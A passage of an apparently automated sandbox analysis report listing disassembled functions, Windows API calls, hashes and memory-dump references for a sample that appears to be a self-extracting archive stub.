                                                                                      • Part of subcall function 00160B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0015AC49,?,?,?,0015ABF8,?,-00000002,?,00000000,?), ref: 00160B28
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00169006
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                    • String ID: EDIT
                                                                                    • API String ID: 4243998846-3080729518
                                                                                    • Opcode ID: e57f5b34171f95ae58ed33aee49130e6fb2b5f3073c60085f392c9753b4087b5
                                                                                    • Instruction ID: 71b6339ad26ee134d5c5d04462b5c8e5a5798f155b68d2c49a5b199fc3b91430
                                                                                    • Opcode Fuzzy Hash: e57f5b34171f95ae58ed33aee49130e6fb2b5f3073c60085f392c9753b4087b5
                                                                                    • Instruction Fuzzy Hash: 3DF08232A0132877EB306A659D05FAB76ACAF4AB11F440066BE00F3981D7609E52C7E6
                                                                                    Function 0016BE0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 905 16be0a-16be35 call 16cec0 SetEnvironmentVariableW call 15ef07 909 16be3a-16be3e 905->909 910 16be62-16be66 909->910 911 16be40-16be44 909->911 912 16be4d-16be54 call 15effe 911->912 915 16be46-16be4c 912->915 916 16be56-16be5c SetEnvironmentVariableW 912->916 915->912 916->910
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0016BE20
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0016BE5C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: a329ec0fb534236f9b6374b8ed1122747688fac353874e6b05f8c08a821c7262
                                                                                    • Instruction ID: 25759cc0af134dd5c99a6a3396ad42c6585945e7a11faa88344b40184d2cf254
                                                                                    • Opcode Fuzzy Hash: a329ec0fb534236f9b6374b8ed1122747688fac353874e6b05f8c08a821c7262
                                                                                    • Instruction Fuzzy Hash: 1EF0A072805238FAC7252FD08C4DAF67B9CAF18B52B040052FD989A141EB668ED0CBE0
                                                                                    Function 0015973D Relevance: 6.1, APIs: 4, Instructions: 99fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 917 15973d-15975e call 16cec0 920 159767 917->920 921 159760-159765 917->921 922 159769-159786 920->922 921->920 921->922 923 15978e-159798 922->923 924 159788 922->924 925 15979d-1597c8 CreateFileW 923->925 926 15979a 923->926 924->923 927 15982c-159841 925->927 928 1597ca-1597ec GetLastError call 15b275 925->928 926->925 929 159843-159856 call 15f10e 927->929 930 15985b-159866 927->930 934 1597ee-159810 CreateFileW GetLastError 928->934 935 15981b-159820 928->935 929->930 937 159816-159819 934->937 938 159812 934->938 935->927 936 159822 935->936 936->927 937->927 937->935 938->937
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0015777A,?,00000005,?,00000011), ref: 001597BD
                                                                                    • GetLastError.KERNEL32(?,?,0015777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001597CA
                                                                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0015777A,?,00000005,?), ref: 001597FF
                                                                                    • GetLastError.KERNEL32(?,?,0015777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00159807
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1214770103-0
                                                                                    • Opcode ID: cc8acbc172c67791dc3b5d1efe57f5d7e204dc018374758e0bb425b2b919bf06
                                                                                    • Instruction ID: 4d3f12c460e9d28f474d39089a5bf781da6aea73f062965781a1b656d0241761
                                                                                    • Opcode Fuzzy Hash: cc8acbc172c67791dc3b5d1efe57f5d7e204dc018374758e0bb425b2b919bf06
                                                                                    • Instruction Fuzzy Hash: 4E315470840349EFE7209F248C45BE6BBA8FB49360F104629FDA08B2D1D375998CCBD1
                                                                                    Function 00159613 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00159623
                                                                                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0015963B
                                                                                    • GetLastError.KERNEL32 ref: 0015966D
                                                                                    • GetLastError.KERNEL32 ref: 0015968C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    • Opcode ID: a784fa8a2c1bd40ad1189e58faebc62c951cfcbb1f349681a73f1a3699068dc8
                                                                                    • Instruction ID: 7fde3f92a457e20a0510d67db2bc2443b685a357ca94a9c0c74329b7cdd8ec52
                                                                                    • Opcode Fuzzy Hash: a784fa8a2c1bd40ad1189e58faebc62c951cfcbb1f349681a73f1a3699068dc8
                                                                                    • Instruction Fuzzy Hash: C0117C74500208EFCF249F61C804AAA77ADEB19362F10852AFD7A8D290D7798D8CDF53
                                                                                    Function 001777D1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00172213,00000000,00000000,?,00177778,00172213,00000000,00000000,00000000,?,00177975,00000006,FlsSetValue), ref: 00177803
                                                                                    • GetLastError.KERNEL32(?,00177778,00172213,00000000,00000000,00000000,?,00177975,00000006,FlsSetValue,00183768,00183770,00000000,00000364,?,001763F1), ref: 0017780F
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00177778,00172213,00000000,00000000,00000000,?,00177975,00000006,FlsSetValue,00183768,00183770,00000000), ref: 0017781D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 5ed6571ec99fad3c70336efeef44b8d331fc880df62a813925a40eac91d16537
                                                                                    • Instruction ID: 7394821a2b8734c3e8005511d1509887731f69c761a1ee5cc287bcaa96649494
                                                                                    • Opcode Fuzzy Hash: 5ed6571ec99fad3c70336efeef44b8d331fc880df62a813925a40eac91d16537
                                                                                    • Instruction Fuzzy Hash: 1101F7327092269BC7664B68DC4CE6A3BA8AF09BB1F214624F90ED75C0D720DE41C7E0
                                                                                    Function 0016991E Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0016992F
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00169940
                                                                                    • TranslateMessage.USER32(?), ref: 0016994A
                                                                                    • DispatchMessageW.USER32(?), ref: 00169954
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4217535847-0
                                                                                    • Opcode ID: 83ced71db3443ae5e620e81c83ec12184d2581cef26a7949b9f88c152f3e255b
                                                                                    • Instruction ID: df072cdbeb2256e353d18115a854e00855f603c4799d8acc72ca4549c1dc2d88
                                                                                    • Opcode Fuzzy Hash: 83ced71db3443ae5e620e81c83ec12184d2581cef26a7949b9f88c152f3e255b
                                                                                    • Instruction Fuzzy Hash: 46E0ED72C0212EA7DB20ABE6AC4CCDB7F6CEF062657404016B519D3800D6789645C7F1
                                                                                    Function 0015FBB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0015FBD5
                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0015FC1C
                                                                                      • Part of subcall function 00156DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00156DF1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2655393344-3849766595
                                                                                    • Opcode ID: c9703943c817e7eefbdcf6676ae0088571f36702f4923d9a762fee3a104919fe
                                                                                    • Instruction ID: 4ccbe2355d1745f3f5f3ec95c9cda734b756a2596a6465c73741ac735662317d
                                                                                    • Opcode Fuzzy Hash: c9703943c817e7eefbdcf6676ae0088571f36702f4923d9a762fee3a104919fe
                                                                                    • Instruction Fuzzy Hash: 1D01D67134470EABE6207F98DC42F677769EB54752F20043EFD929A580CBB1A84A8B70
                                                                                    Function 00159BC8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,0015C853,00000001,?,?,?,00000000,0016420B,?,?,?,?,?,00163CB0), ref: 00159BE3
                                                                                    • WriteFile.KERNEL32(?,00000000,?,00163EB8,00000000,?,?,00000000,0016420B,?,?,?,?,?,00163CB0,?), ref: 00159C23
                                                                                    • WriteFile.KERNELBASE(?,00000000,?,00163EB8,00000000,?,00000001,?,?,0015C853,00000001,?,?,?,00000000,0016420B), ref: 00159C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    • Opcode ID: 5bf159867c7a8aef6922f97e9057889d84bbb970cf35385c26ea103fa8fdd1e2
                                                                                    • Instruction ID: 25f116e656f0b1899e9f215398b087e609f55f53688af86edf0c689553ed12f6
                                                                                    • Opcode Fuzzy Hash: 5bf159867c7a8aef6922f97e9057889d84bbb970cf35385c26ea103fa8fdd1e2
                                                                                    • Instruction Fuzzy Hash: 1F310371108609EFEB209E14D948FA6BBA8EB50702F004119F9B59B5D0C775E88CCBA3
                                                                                    Function 00159E86 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 00159EAD
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 00159EE0
                                                                                    • GetLastError.KERNEL32(?,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 00159EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 2485089472-0
                                                                                    • Opcode ID: c595d190406ec23755923d389050679ac7fe20c9f893798e56e6d4dbe2cdfc08
                                                                                    • Instruction ID: b0575b8fefa013f3dba6ffbf7c0ab9d14aa96290fb4b4fb28bc09a28e720c592
                                                                                    • Opcode Fuzzy Hash: c595d190406ec23755923d389050679ac7fe20c9f893798e56e6d4dbe2cdfc08
                                                                                    • Instruction Fuzzy Hash: 53019271110158E6DB21EA648C86FFE775CDF1A783F080456FC75DE491DB608A8CA6E3
                                                                                    Function 0015C413 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 8d08f4997a612bc569a591e155e00b82747890917d6b0e2ca51b256b33dabe87
                                                                                    • Instruction ID: 93c1d36cf9cc8db0b6bfd11c07762b08b4fc2271732ba4a0278cad6314331f6a
                                                                                    • Opcode Fuzzy Hash: 8d08f4997a612bc569a591e155e00b82747890917d6b0e2ca51b256b33dabe87
                                                                                    • Instruction Fuzzy Hash: 9E119170A01344DFDB14EBF89915BBEBBE4AFA4301F14056EA8999B242DBB45E04C7D1
                                                                                    Function 00153AA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3519838083-2756464174
                                                                                    • Opcode ID: 629610ef0e1bcc2612b9b0aceae2be40536422a7a3eefa9bcde9e40189aca3b6
                                                                                    • Instruction ID: 89049ce228760ac5022968a03ba13749fc034e3656cfd07b0e68c3fe049fabf2
                                                                                    • Opcode Fuzzy Hash: 629610ef0e1bcc2612b9b0aceae2be40536422a7a3eefa9bcde9e40189aca3b6
                                                                                    • Instruction Fuzzy Hash: 7D61A071500B44EEDB25DB70CC41AE7B7F8AB24342F84495EA9BA8B142E7326A4CCF50
                                                                                    Function 001782C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001782E8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-3916222277
                                                                                    • Opcode ID: 739f9ee2bccc746f06e1637edf19d9a2c0fbe7a1dbfd6d4b2ea3293a80ff61c0
                                                                                    • Instruction ID: 627e93d6d38f067fa1544b70c6bdc58a159a7c839435872306202c37408be330
                                                                                    • Opcode Fuzzy Hash: 739f9ee2bccc746f06e1637edf19d9a2c0fbe7a1dbfd6d4b2ea3293a80ff61c0
                                                                                    • Instruction Fuzzy Hash: 96415A7094824C9EDF268F288C88BFABBF9EF05704F1444ECE58E86142D7359A45CF20
                                                                                    Function 00151DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151DA6
                                                                                      • Part of subcall function 00153AA3: __EH_prolog.LIBCMT ref: 00153AA8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3519838083-2756464174
                                                                                    • Opcode ID: 943d5b0be3526e2b879fbff0b8f86ca00ef39ca1fd21cfd2ebcd4da3ce0760cf
                                                                                    • Instruction ID: 4b80d0c05a504edb7cbf2ceacb065cbb8ed3361f718fb2a03f48859263e2cdd5
                                                                                    • Opcode Fuzzy Hash: 943d5b0be3526e2b879fbff0b8f86ca00ef39ca1fd21cfd2ebcd4da3ce0760cf
                                                                                    • Instruction Fuzzy Hash: F1213935904209EFCB16DF98C942AEEFBF6EF5C300B10046DE855A7251CB325A15CB60
                                                                                    Function 001518FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3519838083-2756464174
                                                                                    • Opcode ID: 7dd12df4db7c84debbb0da8e4747a8e8ad8dd1ede1e93c7dd0f4d9ecd92d9e67
                                                                                    • Instruction ID: 9a38af07d1a0c38192f644cc48b43b962b2aeed048744bf1e67b5ad18ffff7b3
                                                                                    • Opcode Fuzzy Hash: 7dd12df4db7c84debbb0da8e4747a8e8ad8dd1ede1e93c7dd0f4d9ecd92d9e67
                                                                                    • Instruction Fuzzy Hash: 5811E4B1A00202FFDB05DF64C495ABEF7AABF55305F04401AEC259F241DB309959DB90
                                                                                    Function 00177A09 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00177A7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: LCMapStringEx
                                                                                    • API String ID: 2568140703-3893581201
                                                                                    • Opcode ID: 7595974e7e7a3e7bf3840db0f21101578fc91bd97b9f382a7db8178fcee3cc28
                                                                                    • Instruction ID: 0aafbef2b48a732bca6ffa68813f78ba70667c3ea79263aa4175972eb665a091
                                                                                    • Opcode Fuzzy Hash: 7595974e7e7a3e7bf3840db0f21101578fc91bd97b9f382a7db8178fcee3cc28
                                                                                    • Instruction Fuzzy Hash: F801D37664420DBBCF02AF90DC0AEAE7F72EF48750F458114FE1966160CB76DA71AB81
                                                                                    Function 001779A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0017709A), ref: 001779F2
                                                                                    Strings
                                                                                    • InitializeCriticalSectionEx, xrefs: 001779C2
                                                                                    Memory Dump Source
